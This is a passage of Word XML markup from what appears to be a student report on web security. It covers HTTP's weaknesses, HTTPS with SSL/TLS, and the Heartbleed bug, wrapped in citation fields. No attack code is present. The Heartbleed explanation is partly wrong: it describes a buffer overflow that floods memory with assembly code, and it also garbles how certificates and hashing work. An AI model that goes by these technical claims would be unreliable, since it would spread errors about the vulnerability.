        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"This paper provides an overview of the Open Systems Interconnection (OSI) reference model which defines a hierarchical architecture that logically partitions the functions required to support system-to-system communication and has served as the most basic elements of computer networking since the inception in 1984. The Open Systems Interconnection (OSI) reference model has served as the most basic elements of computer networking since the inception in 1984. The OSI Reference Model is based on a proposal developed by the International Standards Organization (ISO). The original objective of the OSI model was to provide a set of design standards for equipment manufacturers so they could communicate with each other. The OSI model defines a hierarchical architecture that logically partitions the functions required to support system-to-system communication. The OSI model has seven layers, each of which has a different level of abstraction and performs a well-defined function. The principles that were applied to arrive at the seven layers are as follows (Feig) 1 : • A layer should be created where a different level of abstraction is needed. • Each layer should perform a well-defined function. • The function of each layer should be chosen with an eye toward defining internationally standardized protocols. • The layer boundaries should be chosen to minimize the information flow across the interfaces. • The number of layers should be large enough that distinct functions need not be thrown together in the same layer out of necessary, and small enough that the architecture does not become unwieldy. The layered approach offers several advantages. By separating networking functions into logical smaller pieces, network problems can more easily be solved through a divide-and-conquer methodology. OSI layers also allow extensibility. New protocols and other network services are generally easier to add to a layered architecture.","author":[{"dropping-particle":"","family":"SANS","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["0"]]},"title":"The OSI Model: An Overview The OSI Model: An Overview Rachelle L. Miller GSEC Practical Assignment Version 1.2e","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=6acebc28-9b5d-4912-a9f9-8196f0487bf2"]}],"mendeley":{"formattedCitation":"[74]","plainTextFormattedCitation":"[74]","previouslyFormattedCitation":"[74]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E678E7" w:rsidRPr="00E678E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[74]</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0048407D">
        <w:t xml:space="preserve"> model and then </w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t>transfer</w:t>
      </w:r>
      <w:r w:rsidR="0048407D">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t xml:space="preserve"> data across the Internet </w:t>
      </w:r>
      <w:r w:rsidR="0048407D">
        <w:t xml:space="preserve">using Transport Control Protocol (TCP) </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1093/geront/gns169","ISBN":"1565923227","ISSN":"1537-6613","PMID":"24760730","abstract":"This complete guide to setting up and running a TCP/IP network is essential for network administrators, and invaluable for users of home systems that access the Internet. The book starts with the fundamentals - what protocols do and how they work, how addresses and routing are used to move data through the network, how to set up your network connection - and then covers, in detail, everything you need to know to exchange information via the Internet. Included are discussions on advanced routing protocols (RIPv2, OSPF, and BGP) and the gated software package that implements them, a tutorial on configuring important network services - including DNS, Apache, sendmail, Samba, PPP, and DHCP - as well as expanded chapters on troubleshooting and security. \"TCP/IP Network Administration\" is also a command and syntax reference for important packages such as gated, pppd, named, dhcpd, and sendmail. With coverage that includes Linux, Solaris, BSD, and System V TCP/IP implementations, the third edition contains: Overview of TCP/IP Delivering the data Network services Getting startedM Basic configuration Configuring the interface Configuring routing Configuring DNS Configuring network servers Configuring sendmail Configuring Apache Network security Troubleshooting Appendices include \"dip,\" \"ppd,\" and \"chat\" reference, a \"gated\" reference, a \"dhcpd\" reference, and a \"sendmail\" reference This new edition includes ways of configuring Samba to provide file and print sharing on networks that integrate Unix and Windows, and a new chapter is dedicated to the important task of configuring the Apache web server. Coverage of network securitynow includes details on OpenSSH, stunnel, gpg, iptables, and the access control mechanism in xinetd. Plus, the book offers updated information about DNS, including details on BIND 8 and BIND 9, the role of classless IP addressing and network prefixes, and the changing role of registrars. Without a doubt, \"TCP/IP Network Administration, 3rd Edition\" is a must-have for all network administrators and anyone who deals with a network that transmits data over the Internet.","author":[{"dropping-particle":"","family":"Hunt","given":"Craig","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Journal of infectious diseases","id":"ITEM-1","issued":{"date-parts":[["2002"]]},"title":"TCP/IP Network Administration","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=e04853d1-f514-4f5d-ba94-4a01b42e1852"]}],"mendeley":{"formattedCitation":"[54]","plainTextFormattedCitation":"[54]","previouslyFormattedCitation":"[54]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E678E7" w:rsidRPr="00E678E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[54]</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t xml:space="preserve">via port 80. Although HTTP is highly efficient it is </w:t>
      </w:r>
      <w:r w:rsidR="00212456">
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidR="000542B1">
        <w:t xml:space="preserve"> been proven</w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00212456">
        <w:t>to be</w:t>
      </w:r>
      <w:r w:rsidR="000542B1">
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t xml:space="preserve"> insecure</w:t>
      </w:r>
      <w:r w:rsidR="000542B1">
        <w:t xml:space="preserve"> standalone protocol by network security researchers</w:t>
      </w:r>
      <w:r w:rsidR="00212456">
        <w:t xml:space="preserve"> whom found</w:t>
      </w:r>
      <w:r w:rsidR="0048407D">
        <w:t xml:space="preserve"> that unencrypted sensitive  data such as financial details, login credentials (Username/Password) etc being sent via HTTP could be stolen or ‘Hijacked’ in transit by malicious actors along with code injection to the website by a third party. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8984A" w14:textId="78E6AC10" w:rsidR="009E69D4" w:rsidRDefault="0048407D" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Therefore, HTTP-Secure (HTTPS) </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1097/wnn.0000000000000150","ISSN":"1543-3633","abstract":"This memo describes a syntax for securing messages sent using the Hypertext Transfer Protocol (HTTP), which forms the basis for the World Wide Web. Secure HTTP (S-HTTP) provides independently applicable security services for transaction confidentiality, authenticity/integrity and non-repudiability of origin. The protocol emphasizes maximum flexibility in choice of key management mechanisms, security policies and cryptographic algorithms by supporting option negotiation between parties for each transaction.","author":[{"dropping-particle":"","family":"Kosakowski","given":"Heather L.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Saxe","given":"Rebecca","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Cognitive And Behavioral Neurology","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"https","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=97e3417e-e9b3-45c7-9aa3-bf827aed5c82"]}],"mendeley":{"formattedCitation":"[75]","plainTextFormattedCitation":"[75]","previouslyFormattedCitation":"[75]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E678E7" w:rsidRPr="00E678E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[75]</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>was created</w:t>
      </w:r>
      <w:r w:rsidR="009E69D4">
        <w:t xml:space="preserve"> to overcome the security issues of standalone HTTP. To solve the issues of HTTP an additional layer was implemented within the HTTP protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that utilises Secure Socket Layer and Transport Layer Security (SSL/TLS)</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"SSL/TLS (Secure socket layer) is a cryptographic protocol that provides secure communication over internet. Any parties when they want to perform secure communication over internet. They can use SSL/TLS and be sure of their data not been disclosed over the network. There has been lot of security issues already identified and patches have been released for it. Still companies fail to implement all the patches because they lack knowledge required to understand SSL/TLS security and its implementation. We will develop a scanner for SSL/TLS which identifies well know existing issues in SSL/TLS security and provide report with SSL/TLS implementation issues. This will help any person without the knowledge of SSL/TLS security to identify weakness in their SSL/TLS secure implementation. This paper particularly tests the server against vulnerabilities such as SSLv2 is supported, weak ciphers enabled, OPENSSL/TLS is vulnerable to heart bleed, certificate validity, poodle attack is possible. The resources to those who are new to the information assurance field can provide an insight to two common protocols used in Internet security. Though SSL and TLS are not the only secure protocols currently in use, they are very common for sites dealing with transactions that could involve sensitive data (eg: personal and financial information, passwords etc). Keywords: Cipher Suites (CS), InetSocketAddress (ISA), Server Certificate (SC), Heart Bleed (HB).","author":[{"dropping-particle":"","family":"S","given":"Pavithra","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pari","given":"Sheeba","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Professor","given":"Asst","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal of Computer Science and Mobile Computing","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"SSL/TLS SECURITY POSTURE IDENTIFIER","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=e6fa7620-5ef8-4a79-b3c7-a8ef6463d9e7"]},{"id":"ITEM-2","itemData":{"URL":"https://www.ibm.com/support/knowledgecenter/en/SSFKSJ_7.1.0/com.ibm.mq.doc/sy10660_.htm","abstract":"SSL/TLS","accessed":{"date-parts":[["2019","1","22"]]},"author":[{"dropping-particle":"","family":"IBM","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"ibm.com","id":"ITEM-2","issued":{"date-parts":[["2017"]]},"page":"1","title":"SSL/TLS handshake","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=d88d009d-c644-326a-b14c-c4b3b6f2e7d0"]},{"id":"ITEM-3","itemData":{"abstract":"—In recent years, there has been tremendous development in Internet. Right from retrieving information about any subject, you can use Internet for many purposes. But when two parties like client and a server are communicating over the Internet, an attacker may interface the communication. Netscape came with 'SSL' i.e. Secure Socket Layer, to avoid this problem and to make the communication over the Internet secure. Today 'SSL' is widely used over the Internet for the secure communication. secure sockets layer (SSL) security protocol is largely used nowadays by the World Wide Web to secure Internet communications and an increasing number of handheld devices are provided by the manufacturers with preinstalled applications (e.g. Web browsers) and digital certificates in order to support SSL in wireless environments too. We present first a comprehensive analysis of SSL protocol and the cryptographic algorithms used as building blocks in the protocol. [2] We demonstrate next that SSL support embedded also in other applications for some mobile devices does not impact significantly on overall application's performance when communicating with other parties. We wanted to use for our experimental setup, APIs and tools that are either available for the majority of the handheld devices or that can be downloaded and tested freely and without major modifications. This is the especially the case of application developers, who preferably would not use modified versions of cryptographic libraries and special drivers characteristic to academic/commercial testing environments. We also developed a tool named SSL performance for testing SSL security protocol's performance when transferring either small amounts of data (e.g. credit card number) or of medium dimension (e.g. a document in PDF format), with handheld devices. We've compared the results obtained with SSLperf on Windows CE-enabled handheld and pocket PCs and 'powerful' Windows 2000/XP-enabled platforms with other related works. [1] Keywords— Secure sockets layer, hypertext transfer protocol,Transport Layer Security, Transmission Control Protocol/Internet Protocol, Internet Messaging Access Protocol.","author":[{"dropping-particle":"","family":"Dipti","given":"Ms","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Charjan","given":"S","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Priyanka","given":"Ms","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bochare","given":"S","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bhuyar","given":"Yogesh R","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal Of Computer Science And Applications","id":"ITEM-3","issued":{"date-parts":[["2013"]]},"title":"An Overview of Secure Sockets Layer","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=3916d579-6d0b-4166-a913-62dd01eda1c9"]}],"mendeley":{"formattedCitation":"[76]–[78]","plainTextFormattedCitation":"[76]–[78]","previouslyFormattedCitation":"[76]–[78]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E678E7" w:rsidRPr="00E678E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[76]–[78]</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t>that is part of the OpenSSL</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"059600270X","PMID":"12787104","abstract":"OpenSSL is a popular and effective open source version of SSL/TLS, the most widely used protocol for secure network communications. The only guide available on the subject, Network Security with OpenSSLdetails the challenges in securing network communications, and shows you how to use OpenSSL tools to best meet those challenges. Focused on the practical, this book provides only the information that is necessary to use OpenSSL safely and effectively.","author":[{"dropping-particle":"","family":"Chandra","given":"Pravir.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Messier","given":"Matt.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Viega","given":"John.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"O'Reily, June","id":"ITEM-1","issued":{"date-parts":[["2002"]]},"title":"Network security with OpenSSL","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=2e80cc6f-5cb3-42bb-8fbb-9e909c91efe0"]}],"mendeley":{"formattedCitation":"[79]","plainTextFormattedCitation":"[79]","previouslyFormattedCitation":"[79]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E678E7" w:rsidRPr="00E678E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[79]</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve"> cryptographic library </w:t>
      </w:r>
      <w:r>
        <w:t>via TCP port 443</w:t>
      </w:r>
      <w:r w:rsidR="009E69D4">
        <w:t xml:space="preserve"> to create HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t xml:space="preserve">TLS </w:t>
      </w:r>
      <w:r w:rsidR="009E69D4">
        <w:t>utilise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encrypted certificates </w:t>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00320DBC">
        <w:t xml:space="preserve">predominantly </w:t>
      </w:r>
      <w:r w:rsidR="009E69D4">
        <w:t>employ</w:t>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t xml:space="preserve"> military grade encryption</w:t>
      </w:r>
      <w:r w:rsidR="009E69D4">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t xml:space="preserve"> Advanced Encryption Standard – 256bit (AES-256)</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":" The Advanced Encryption Standard (AES) specifies a FIPS-approved cryptographic algorithm that can be used to protect electronic data. The AES algorithm is a symmetric block cipher that can encrypt (encipher) and decrypt (decipher) information. Encryption converts data to an unintelligible form called ciphertext; decrypting the ciphertext converts the data back into its original form, called plaintext. The AES algorithm is capable of using cryptographic keys of 128, 192, and 256 bits to encrypt and decrypt data in blocks of 128 bits.","author":[{"dropping-particle":"","family":"(N.I.S.T.)","given":"U S Department of Commerce / the National Technical Information Service","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Federal Information Processing Standards Publication (FIPS)","id":"ITEM-1","issued":{"date-parts":[["2001"]]},"number-of-pages":"1-47","title":"Advanced Encryption Standard (AES)","type":"report","volume":"FIPS Pub 1"},"uris":["http://www.mendeley.com/documents/?uuid=a68a2775-28c7-4e3c-b53e-2487efde5bcc"]}],"mendeley":{"formattedCitation":"[80]","plainTextFormattedCitation":"[80]","previouslyFormattedCitation":"[80]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E678E7" w:rsidRPr="00E678E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[80]</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t xml:space="preserve"> to encrypt the data in transit and Secure Hashing Algorithm – 384bit (SHA-384)</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.6028/NIST.FIPS.202","abstract":"This Standard specifies the Secure Hash Algorithm-3 (SHA-3) family of functions on binary data. Each of the SHA-3 functions is based on an instance of the KECCAK algorithm that NIST selected as the winner of the SHA-3 Cryptographic Hash Algorithm Competition. This Standard also specifies the KECCAK-p family of mathematical permutations, including the permutation that underlies KECCAK, in order to facilitate the development of additional permutation-based cryptographic functions. The SHA-3 family consists of four cryptographic hash functions, called SHA3-224, SHA3-256, SHA3-384, and SHA3-512, and two extendable-output functions (XOFs), called SHAKE128 and SHAKE256. Hash functions are components for many important information security applications, including 1) the generation and verification of digital signatures, 2) key derivation, and 3) pseudorandom bit generation. The hash functions specified in this Standard supplement the SHA-1 hash function and the SHA-2 family of hash functions that are specified in FIPS 180-4, the Secure Hash Standard. Extendable-output functions are different from hash functions, but it is possible to use them in similar ways, with the flexibility to be adapted directly to the requirements of individual applications, subject to additional security considerations.","author":[{"dropping-particle":"","family":"Dworkin","given":"Morris J.","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"SHA-3 Standard: Permutation-Based Hash and Extendable-Output Functions","type":"report"},"uris":["http://www.mendeley.com/documents/?uuid=82a6fb10-5133-4e64-a7a1-ff47f089e37e"]}],"mendeley":{"formattedCitation":"[81]","plainTextFormattedCitation":"[81]","previouslyFormattedCitation":"[81]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E678E7" w:rsidRPr="00E678E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[81]</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t xml:space="preserve"> to hash the public certificate keys to authenticate the connection</w:t>
      </w:r>
      <w:r w:rsidR="00320DBC">
        <w:t xml:space="preserve">, although various cryptographic encryption and hashing </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:t>algorithms</w:t>
      </w:r>
      <w:r w:rsidR="00320DBC">
        <w:t xml:space="preserve"> can be utilised the AES-256 and SHA-384 cryptographic method is widely considered as the most secure</w:t>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve"> The certificates are issued and authenticated by a centralised certification authority before a connection can be made to a website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F896E4C" w14:textId="10EE1211" w:rsidR="00961AF0" w:rsidRDefault="00DA7CB6" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>However, although HTTPS is</w:t>
      </w:r>
      <w:r w:rsidR="00BA0758">
        <w:t xml:space="preserve"> far more secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA0758">
        <w:t xml:space="preserve">than HTTP it still has vulnerabilities that modern hackers and security researchers have been able to exploit. The most prolific HTTPS vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve">is the </w:t>
      </w:r>
      <w:r w:rsidR="00475E64">
        <w:lastRenderedPageBreak/>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t>Heartbleed</w:t>
      </w:r>
      <w:r w:rsidR="00475E64">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The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users.","author":[{"dropping-particle":"","family":"Mehta","given":"Neel","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"CVE-2014-0160","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"The Heartbleed Bug","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=c28dcd5c-4a15-4c5a-b49c-749cb8fa2ea3"]}],"mendeley":{"formattedCitation":"[82]","plainTextFormattedCitation":"[82]","previouslyFormattedCitation":"[82]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D16731" w:rsidRPr="00D16731">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[82]</w:t>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve"> SSL</w:t>
      </w:r>
      <w:r w:rsidR="00475E64">
        <w:t>/TLS</w:t>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve"> vulnerability (</w:t>
      </w:r>
      <w:r w:rsidR="00373ED1" w:rsidRPr="00373ED1">
        <w:t>CVE-2014-0160</w:t>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00961AF0">
        <w:t xml:space="preserve">advanced buffer overflow attack </w:t>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"9781593271442","abstract":"Hacking is the art of creative problem solving, whether that means finding an unconventional solution to a difficult problem or exploiting holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation needed to really push the envelope. Rather than merely showing how to run existing exploits, author Jon Erickson explains how arcane hacking techniques actually work. To share the art and science of hacking in a way that is accessible to everyone, Hacking: The Art of Exploitation, 2nd Edition introduces the fundamentals of C programming from a hacker's perspective. The included LiveCD provides a complete Linux programming and debugging environment-all without modifying your current operating system. Use it to follow along with the book's examples as you fill gaps in your knowledge and explore hacking techniques on your own. Get your hands dirty debugging code, overflowing buffers, hijacking network communications, bypassing protections, exploiting cryptographic weaknesses, and perhaps even inventing new exploits. This book will teach you how to: Program computers using C, assembly language, and shell scripts Corrupt system memory to run arbitrary code using buffer overflows and format strings Inspect processor registers and system memory with a debugger to gain a real understanding of what is happening Outsmart common security measures like nonexecutable stacks and intrusion detection systems Gain access to a remote server using port-binding or connect-back shellcode, and alter a server's logging behavior to hide your presence Redirect network traffic, conceal open ports, and hijack TCP connections Crack encrypted wireless traffic using the FMS attack, and speed up brute-force attacks using a password probability matrix Hackers are always pushing the boundaries, investigating the unknown, and evolving their art. Even if you don't already know how to program, Hacking: The Art of Exploitation, 2nd Edition will give you a complete picture of programming, machine architecture, network communications, and existing hacking techniques. Combine this knowledge with the included Linux environment, and all you need is your own creativity.","author":[{"dropping-particle":"","family":"Erickson","given":"Jon","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Assembly","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"number-of-pages":"480","title":"Hacking: The Art of Exploitation, 2nd Edition","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=6e10367c-08ff-43e4-bca2-606bcca5994a"]}],"mendeley":{"formattedCitation":"[42]","plainTextFormattedCitation":"[42]","previouslyFormattedCitation":"[42]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D16731" w:rsidRPr="00D16731">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[42]</w:t>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve">that exploited a bug within the OpenSSL Library that </w:t>
      </w:r>
      <w:r w:rsidR="006134D8">
        <w:t>utilises heartbeat request messages that includes the length of the message that is to be stored in the memory buffer allocated for heartbeat requests  between the client and  the server</w:t>
      </w:r>
      <w:r w:rsidR="00961AF0">
        <w:t>, in order</w:t>
      </w:r>
      <w:r w:rsidR="006134D8">
        <w:t xml:space="preserve"> to confirm the connection between the two devices was still open, the bug arose due to a programming syntax error that did not check the length of the received heartbeat message that was allocated for buffer memory, therefore an attacker could spoof a heartbeat message to the server with half the allocated length in memory, this </w:t>
      </w:r>
      <w:r w:rsidR="00373ED1">
        <w:t xml:space="preserve">allowed attackers to launch a memory buffer overflow attack to the protected server by </w:t>
      </w:r>
      <w:r w:rsidR="00143D10">
        <w:t xml:space="preserve">flooding the internal memory buffer with </w:t>
      </w:r>
      <w:r w:rsidR="006134D8">
        <w:t>half-length heartbeat</w:t>
      </w:r>
      <w:r w:rsidR="00143D10">
        <w:t xml:space="preserve"> assembly code instructions </w:t>
      </w:r>
      <w:r w:rsidR="006134D8">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00143D10">
        <w:t xml:space="preserve"> then leak</w:t>
      </w:r>
      <w:r w:rsidR="006134D8">
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r w:rsidR="00143D10">
        <w:t xml:space="preserve"> the secure </w:t>
      </w:r>
      <w:r w:rsidR="006134D8">
        <w:t>encrypted data</w:t>
      </w:r>
      <w:r w:rsidR="00143D10">
        <w:t xml:space="preserve"> that was previously stored within the buffer</w:t>
      </w:r>
      <w:r w:rsidR="006134D8">
        <w:t xml:space="preserve"> as a return heartbeat message</w:t>
      </w:r>
      <w:r w:rsidR="00961AF0">
        <w:t>,</w:t>
      </w:r>
